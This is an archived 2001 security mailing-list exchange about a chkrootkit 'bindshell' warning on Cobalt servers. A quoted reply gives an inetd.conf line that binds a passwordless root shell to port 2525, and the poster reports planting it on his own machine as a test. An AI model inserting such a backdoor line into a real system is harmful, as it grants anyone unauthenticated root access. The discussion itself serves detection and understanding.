[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: SV: [cobalt-security] bindshell'... INFECTED (PORTS: 1524
- Subject: Re: SV: [cobalt-security] bindshell'... INFECTED (PORTS: 1524
- From: "Leo Janssen" <lja@xxxxxxx>
- Date: Tue, 11 Dec 2001 14:00:43 +0100
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Hi Michael,
just tried to backdoor myself by inserting below line
into /etc/inetd.conf. After restarting inetd, nmap
states port 2525 is open but I can't connect to
that port via telnet ("Connection closed by foreign host").
Any idea?
Thx in adv
Leo
>Message: 4
>From: Michael Stauber <cobalt@xxxxxxxxxxxxxx>
>Organization: Stauber Multimedia Design
>Such a backdoor in inetd.conf could look like this:
>
>2525 stream tcp nowait root /bin/sh
>
>That line does bind a shell to port 2525 TCP. Upon connection by telnet to
>that port the attacker is directly in as user "root" without being
>prompted for a password.